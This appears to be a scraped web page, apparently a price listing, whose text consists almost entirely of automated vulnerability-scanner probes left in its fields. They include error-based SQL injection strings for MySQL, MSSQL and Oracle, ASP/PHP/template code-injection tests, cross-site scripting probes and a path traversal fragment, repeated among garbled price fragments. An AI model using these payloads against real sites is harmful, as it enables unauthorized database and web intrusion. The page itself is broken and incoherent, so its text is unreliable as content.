  "+response.write(268409241-22)+"
 3

3.- €

  NSFTW
 

.- €

  3
 3

3.- €

  NSFTW
 3

3.- €

  3
 3

3.- €

 
 

.- €

  <% response.write(268409241-22) %>
 

.- €

 
 

1);DECLARE/.- €

  3
 3

3.- €

 
 '+netsparker(9)+'

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

1);DECLARE/.- €

  <% response.write(268409241-22) %>
 3

3.- €

  3
 3

3.- €

 
 

.- €

  '+NSFTW+'
 

.- €

  3
 3

3.- €

 
 

.- €

  '+NSFTW+'
 3

3.- €

  3
 3

3.- €

  print(int)0xFFF9999-22
 

.- €

  3
 3

3.- €

 
 

syscolumns.- €

 
 

.- €

 
 '+netsparker(9)

.- €

  3
 3

3.- €

 
 

.- €

  (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),
 

.- €

  print(int)0xFFF9999-22
 3

3.- €

  3
 3

3.- €

  3
 3

syscolumns.- €

  3
 3

3.- €

 
 

.- €

  (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  +print(int)0xFFF9999-22;//
 

.- €

 
 

-1 AND (SEL.- €

  3
 3

3.- €

 
 

.- €

  -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT
 

.- €

 
 

.- €

  +print(int)0xFFF9999-22;//
 3

3.- €

  3
 3

-1 AND (SEL.- €

 
 "+netsparker(9)+"

.- €

  -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  '+print(int)0xFFF9999-22+'
 

.- €

 
 

(select sle.- €

  -1\'+(select 1 and row(1,1)>(select coun
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  '+print(int)0xFFF9999-22+'
 3

3.- €

  3
 3

(select sle.- €

 
 

.- €

  3
 3

3.- €

  "+print(int)0xFFF9999-22+"
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

(select dbm.- €

  -1\'+(select 1 and row(1,1)>(select coun
 3

3.- €

 
 "+netsparker(9)

.- €

  3
 3

3.- €

 
 

.- €

  "+print(int)0xFFF9999-22+"
 3

3.- €

 
 

.- €

  3
 3

(select dbm.- €

 
 

.- €

  1,1 procedure analyse(extractvalue(rand(
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

1' || (sele.- €

  1,1 procedure analyse(extractvalue(rand(
 3

3.- €

 
 " netsparker(9) "

.- €

  3
 3

3.- €

 
 

.- €

 
 3

3.- €

 
 

.- €

  (length(CTXSYS.DRITHSX.SN(user,(select c
 

.- €

  3
 3

1' || (sele.- €

 
 

.- €

  3
 3

3.- €

  {php}print(int)0xFFF9999-22;{/php}
 

.- €

  (length(CTXSYS.DRITHSX.SN(user,(select c
 3

3.- €

  3
 3

3.- €

 
 

';SELECT pg.- €

  3
 3

3.- €

 
 ' netsparker(9) '

.- €

 
 

.- €

  {php}print(int)0xFFF9999-22;{/php}
 3

3.- €

  '||CTXSYS.DRITHSX.SN(user,(select chr(95
 

.- €

 
 

.- €

  3
 3

';SELECT pg.- €

 
 

.- €

  3
 3

3.- €

  '{${print(int)0xFFF9999-22}}'
 

.- €

  3
 3

3.- €

  '||CTXSYS.DRITHSX.SN(user,(select chr(95
 3

3.- €

 
 

1;SELECT pg.- €

  3
 3

3.- €

 
 

.- €

  '{${print(int)0xFFF9999-22}}'
 3

3.- €

 
  netsparker(9)

.- €

 
 

.- €

 
 %27

.- €

 
 

.- €

  3
 3

1;SELECT pg.- €

  3
 3

3.- €

  [php]print(int)0xFFF9999-22;[/php]
 

.- €

  3
 3

3.- €

  3
 %27

3.- €

 
 

SELECT pg_s.- €

  3
 3

3.- €

 
 

.- €

  [php]print(int)0xFFF9999-22;[/php]
 3

3.- €

 
 javascript:netsparker(9)

.- €

 
 

.- €

 
 (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

.- €

  3
 3

SELECT pg_s.- €

 
 

.- €

  print 0xFFF9999-22
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

3.- €

 
 

1);SELECT p.- €

  print 0xFFF9999-22
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 <%a style=x:expre/**/ssion(netsparker(9))>

.- €

 
 

.- €

 
 '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

.- €

  3
 3

1);SELECT p.- €

  eval('print 0xFFF9999-22')
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

3.- €

 
 

');SELECT p.- €

  eval('print 0xFFF9999-22')
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

.- €

 
 ns:expr/**/ession(netsparker(9))

.- €

  3
 3

');SELECT p.- €

  '+print 0xFFF9999-22+'
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

3.- €

 
 

'));SELECT.- €

  '+print 0xFFF9999-22+'
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

.- €

  3
 3

'));SELECT.- €

 
 

.- €

  "+print 0xFFF9999-22+"
 

.- €

 
 

.- €

  3
 3

3.- €

 
 >

.- €

  3
 '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

3.- €

  3
 3

3.- €

 
 

1));SELECT.- €

  "+print 0xFFF9999-22+"
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

.- €

 
 

.- €

  3
 3

1));SELECT.- €

 
 response.write(268409241-22)'

.- €

  3
 3

3.- €

 
 

.- €

 
 '>

.- €

  3
 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

3.- €

  3
 3

3.- €

 
 

1 + (select.- €

  3
 response.write(268409241-22)'

3.- €

 
 

.- €

  3
 3

3.- €

 
 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

.- €

 
 

.- €

  3
 3

1 + (select.- €

 
 +response.write(268409241-22)'

.- €

  3
 3

3.- €

  3
 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

3.- €

 
 ">

.- €

 
 

(SELECT 1 F.- €

  3
 3

3.- €

  3
 +response.write(268409241-22)'

3.- €

 
 

.- €

 
 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

.- €

  3
 3

(SELECT 1 F.- €

 
 

../../../...- €

  3
 3

3.- €

 
 "+response.write(268409241-22)+"

.- €

  3
 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3.- €

 
 >